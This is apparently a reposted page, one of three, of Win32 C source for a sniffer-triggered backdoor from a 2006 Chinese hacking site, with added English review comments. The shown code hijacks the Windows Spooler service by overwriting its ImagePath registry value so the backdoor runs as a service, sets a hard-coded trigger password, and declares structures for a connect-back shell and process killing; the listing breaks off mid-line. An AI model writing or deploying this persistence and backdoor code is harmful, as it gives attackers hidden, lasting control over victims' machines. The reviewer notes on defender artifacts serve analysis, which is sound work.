简单的无驱动嗅探启动后门 (A simple driverless, sniffer-triggered backdoor — Win32 C listing)
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
Codz

CODE: (this is page 1 of 3 of the listing: the sniffer, packet decoder and shell routines are on the following pages. Backslashes inside string literals appear to have been un-doubled by the site's renderer — e.g. `"SYSTEM\CurrentControlSet\Services\"` — so the code as shown does not compile verbatim.)

////////////////////////////////////////////////////////////////////////////////
//FileName:SimpleBackDoor
//Author:云舒(yunshu@ph4nt0m.org)
//Date:2005-11-5
//Modify:2005-11-15
//Modify:2006-1-1
////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#include <mstcpip.h>
#include <tlhelp32.h>

///////////////////////////////////////////////////////////////////////////////
// Macros / build-time configuration
///////////////////////////////////////////////////////////////////////////////

#define BUFFER_SIZE 1024 * 10 // 10 KiB. NOTE(review): unparenthesised, so only safe in array-size style uses, not in arithmetic
#define SERVICE_NAME "SimpleBackdoor" // name placed in the SERVICE_TABLE_ENTRY by main()
#define SERVICE_DESCRIPTION "Just a simple backdoor" // only referenced by the commented-out CreateService path in ServiceInstall()
#define SERVICE_DISPLAY_NAME "SimpleBackdoor" // only referenced by the commented-out CreateService path in ServiceInstall()
#define PASSWORD "WhereAreYou,Icy" // hard-coded trigger password; not used in this chunk, presumably checked by the decoder on a later page
#define REPLACE_SERVICE_NAME "Spooler" // existing system service whose ImagePath is hijacked by ServiceInstall()
#define FLAG "Icy\>" // shell prompt string. NOTE(review): `\>` is not a valid C escape; the site appears to have stripped doubled backslashes throughout this listing

//#define DEBUG // uncomment to have LogToFile() write to DEBUG_LOG

#ifdef DEBUG
#define DEBUG_LOG "c:\debug.txt" // same stripped-backslash caveat as FLAG: `\d` is not a valid escape as shown
#endif

///////////////////////////////////////////////////////////////////////////////
// Global types and variables
///////////////////////////////////////////////////////////////////////////////

typedef struct ip_hdr // IPv4 header without options. Members are naturally aligned, so sizeof == 20 with no padding.
{
unsigned char h_verlen; // version (high nibble) and header length in 32-bit words (low nibble)
unsigned char tos; // type of service
unsigned short total_len; // total length in bytes (network byte order on the wire)
unsigned short ident; // identification
unsigned short frag_and_flags; // 3 flag bits + 13-bit fragment offset
unsigned char ttl; // time to live
unsigned char proto; // protocol (TCP, UDP, ...)
unsigned short checksum; // header checksum
unsigned int sourceIP; // source address
unsigned int destIP; // destination address
}IP_HEADER; // only declared here; its consumer (Sniffer/DecodeTCP) is on a later page of this listing

typedef struct tcp_hdr // TCP header without options. Naturally aligned, sizeof == 20 with no padding.
{
USHORT th_sport; // source port
USHORT th_dport; // destination port
unsigned int th_seq; // sequence number
unsigned int th_ack; // acknowledgement number
unsigned char th_lenres; // 4-bit data offset (header length in 32-bit words, high nibble) + 4 reserved bits
unsigned char th_flag; // 2 reserved bits + 6 flag bits (URG/ACK/PSH/RST/SYN/FIN)
USHORT th_win; // window size
USHORT th_sum; // checksum
USHORT th_urp; // urgent pointer
}TCP_HEADER;

typedef struct shell_argument // parameters handed to the reverse shell (consumer is StartDoor/StartShell on a later page)
{
char ip[16]; // connect-back IPv4 address as a dotted-quad string (15 chars + NUL fits exactly)
char port[5]; // connect-back port as a string. NOTE(review): a 5-digit port such as "65535" leaves no room for a terminating NUL — check how the producer fills and the consumer reads it
}SHELL_ARGUMENT;

BOOL isRunning; // "service is running" flag; presumably cleared by ServiceControl() and polled by the worker (neither is in this chunk). Not volatile/atomic, so cross-thread visibility is not guaranteed.
SERVICE_STATUS serviceStatus; // status structure reported to the SCM
SERVICE_STATUS_HANDLE hServiceStatus; // presumably the handle returned by RegisterServiceCtrlHandler in ServiceMain (not shown here)

///////////////////////////////////////////////////////////////////////////////
// Prototypes. Only main(), ServiceInstall() and the start of ServiceUnstall()
// are on this page; the one-line descriptions for the rest are taken from
// their names and signatures and should be confirmed against the later pages.
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceInstall( char * ); // -install: point the Spooler service's ImagePath at this binary
BOOL ServiceUnstall( char * ); // -unstall: restore the Spooler ImagePath ("unstall" is the spelling main() accepts)
void ServiceControl( DWORD ); // SCM control handler. NOTE(review): declared without WINAPI
void ServiceMain( DWORD, char **); // service entry point. NOTE(review): declared without WINAPI and with char** instead of LPTSTR*; see the cast in main()
int StartDoor( LPVOID ); // starts the backdoor (LPVOID parameter suggests a thread procedure)
BOOL StartWith( char *, char * ); // TRUE if the first string begins with the second
void LogToFile( char * ); // appends a message to the debug log (DEBUG builds)
void Help( char * ); // prints usage; argument is argv[0]
int Sniffer( void ); // packet sniffer that waits for the trigger (the mstcpip.h include suggests SIO_RCVALL on a raw socket, which itself needs administrative rights)
int DecodeTCP( char * ); // parses a captured packet
int StartShell( SOCKET ); // runs the command shell over a connected socket
int ListProcess( SOCKET ); // writes the process list to the socket
int KillProcess( SOCKET, char * ); // terminates the process identified by the second argument

///////////////////////////////////////////////////////////////////////////////
// Entry point.
//
//   <exe> -install   hijack the Spooler service ImagePath (ServiceInstall)
//   <exe> -unstall   restore it (ServiceUnstall)
//   <exe>            anything else: print usage, then hand the process to the
//                    SCM dispatcher (this is the path taken when the service
//                    manager launches the binary)
//
// Returns 0 on success, -1 if install/uninstall or the dispatcher fails.
///////////////////////////////////////////////////////////////////////////////

int main( int argc, char *argv[] )
{
char filePath[MAX_PATH] = { 0 }; // path of this executable; becomes the new ImagePath in ServiceInstall()
SERVICE_TABLE_ENTRY serviceTable[2];

// The table carries SERVICE_NAME, not the hijacked "Spooler" name.
// NOTE(review): the SCM ignores the table name for SERVICE_WIN32_OWN_PROCESS services, which is presumably why the mismatch does not matter.
serviceTable[0].lpServiceName = SERVICE_NAME;
// NOTE(review): the cast hides that ServiceMain is declared without WINAPI (cdecl/stdcall mismatch on x86 builds).
serviceTable[0].lpServiceProc = ( LPSERVICE_MAIN_FUNCTION )ServiceMain;

serviceTable[1].lpServiceName = NULL; // table terminator
serviceTable[1].lpServiceProc = NULL;

// NOTE(review): return value is not checked; a path of MAX_PATH chars or longer is silently truncated.
GetModuleFileName( NULL, filePath, MAX_PATH );

#ifdef DEBUG
LogToFile( "Call main\n" );
#endif

// stricmp is the MSVC name; there is no case-insensitive compare in standard C.
if( argc == 2 && (!stricmp( argv[1], "-install" )) )
{
if( ServiceInstall( filePath ) != TRUE )
{
printf( "Install service error\n" );
return -1;
}
printf( "Install service successful\n" );
}

else if( argc == 2 && (!stricmp( argv[1], "-unstall" )) )
{
if( ServiceUnstall( SERVICE_NAME ) != TRUE )
{
printf( "Delete service error\n" );
return -1;
}
printf( "Delete service successful\n" );
}

else
{
// Usage is printed unconditionally here, including when the SCM starts the process (a service has no console, so presumably nobody sees it).
Help( argv[0] );

// Blocks until the service stops. When the exe is run from a console rather than by the SCM this call fails (typically error 1063).
if( !StartServiceCtrlDispatcher( serviceTable ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Main StartServiceCtrlDispatcher error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}
}

return 0;
}

///////////////////////////////////////////////////////////////////////////////
// Install: persist by hijacking an existing service.
//
// Instead of registering a new service (the commented-out CreateService path
// below), this overwrites the ImagePath value of the built-in
// REPLACE_SERVICE_NAME ("Spooler") service so that the SCM launches this
// executable in place of spoolsv.exe the next time the service starts.
//
// exeFilePath: full path of this binary (GetModuleFileName result from main()).
// Returns TRUE on success, FALSE if the key cannot be opened or written.
//
// Reviewer notes:
//  - Writing under HKLM\SYSTEM needs an administrative token; there is no
//    privilege check, the Win32 error is just printed.
//  - The original ImagePath is not saved anywhere; ServiceUnstall() restores
//    a hard-coded default instead.
//  - cbData is passed as strlen(exeFilePath), i.e. without the terminating
//    NUL that REG_SZ/REG_EXPAND_SZ values are expected to include.
//  - The binary is not copied; ImagePath points at wherever -install was run.
//  - Defender artifact: Services\Spooler\ImagePath no longer pointing at
//    spoolsv.exe (the print spooler stops working as a side effect).
//  - The registry path literals below appear with single backslashes; the
//    site has evidently stripped the doubled `\\` from the string literals.
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceInstall( char * exeFilePath )
{
char tmpPath[MAX_PATH] = { 0 }; // "SYSTEM\CurrentControlSet\Services\<REPLACE_SERVICE_NAME>"
HKEY key;

#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Path is : %s\n", exeFilePath );
LogToFile( tmp );
#endif

/* Original variant, disabled: register a NEW service with CreateService and set its Description. Kept verbatim for reference; the live code follows this comment.
SC_HANDLE serviceMangerHandle = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE );
if ( serviceMangerHandle == 0 )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open services manager database error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

printf( "Install: Open services manager database error: %d\n", GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open services manager database successful\n" );
#endif

SC_HANDLE serviceHandle = CreateService
(
serviceMangerHandle ,
SERVICE_NAME ,
SERVICE_DISPLAY_NAME ,
SERVICE_ALL_ACCESS ,
SERVICE_WIN32_OWN_PROCESS ,
SERVICE_AUTO_START ,
SERVICE_ERROR_NORMAL ,
exeFilePath ,
NULL ,
NULL ,
NULL ,
NULL ,
NULL
);

if ( serviceHandle == 0 )
{
printf( "Create service error: %d\n", GetLastError() );

CloseServiceHandle( serviceMangerHandle );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: create services successful\n" );
#endif

strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, SERVICE_NAME );

if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

RegSetValueEx( key, "Description", 0, REG_SZ, (BYTE *)SERVICE_DESCRIPTION, strlen(SERVICE_DESCRIPTION) );

#ifdef DEBUG
LogToFile( "Install: write regedit successful\n" );
#endif

RegCloseKey(key);
CloseServiceHandle( serviceHandle );
CloseServiceHandle( serviceMangerHandle );

return TRUE;
*/

// Live path: replace the execution path of the system service "Spooler" with this backdoor.
// Both literals are fixed-size, so the MAX_PATH buffer cannot overflow here.
strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, REPLACE_SERVICE_NAME );

// RegOpenKey is the legacy (16-bit compatibility) API; fails without write access to HKLM\SYSTEM.
if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

// Overwrite ImagePath. The previous value is lost (not read back first).
// NOTE(review): cbData omits the terminating NUL (should be strlen + 1 for a string value).
if( RegSetValueEx( key,
"ImagePath",
0,
REG_EXPAND_SZ,
(BYTE *)exeFilePath,
strlen(exeFilePath) ) != ERROR_SUCCESS )

{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Set key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Set key %s error: %d\n", tmpPath, GetLastError() );

// NOTE(review): key handle is leaked on this error path (no RegCloseKey).
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: write regedit successful\n" );
#endif

RegCloseKey(key);

return TRUE;
}

///////////////////////////////////////////////////////////////////////////////
//删除服务函数
///////////////////////////////////////////////////////////////////////////////

BOOL ServiceUnstall( char * serviceName )
{
/*删除新服务,现在替换服务不用这样删除
SC_HANDLE scmHandle = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS);

if ( scmHandle == NULL )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceUntall: open services database error while delete service: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return FALSE;
}

SC_HANDLE scHandle = OpenService( scmHandle, serviceName, SERVICE_ALL_ACCESS );

if( scHandle == NULL )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceUntall: open services database error while delete service: %d\n", GetLastError() );
LogToFile( tmp );
#endif

CloseServiceHandle( scmHandle );

return FALSE;
}

DeleteService( scHandle );

CloseServiceHandle( scHandle );
CloseServiceHandle( scmHandle );

return TRUE;
*/

char tmpPath[MAX_PATH] = { 0 };
HKEY key;
char *oldFilePath = "%systemroot%\system32\spoolsv.exe";

strcpy( tmpPath, "SYSTEM\CurrentControlSet\Services\" );
strcat( tmpPath, REPLACE_SERVICE_NAME );

if( RegOpenKey( HKEY_LOCAL_MACHINE, tmpPath, &key ) != ERROR_SUCCESS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Install: Open key %s error: %d\n", tmpPath, GetLastError() );
LogToFile( tmp );
#endif

printf( "Open key %s error: %d\n", tmpPath, GetLastError() );
return FALSE;
}

#ifdef DEBUG
LogToFile( "Install: open regedit successful\n" );
#endif

if( RegSetValueEx( key,
"ImagePath",
0,
REG_EXPAND_SZ,
(BYTE *)oldFilePath,
strlen(oldFilePath) ) != ERROR_SUCCE
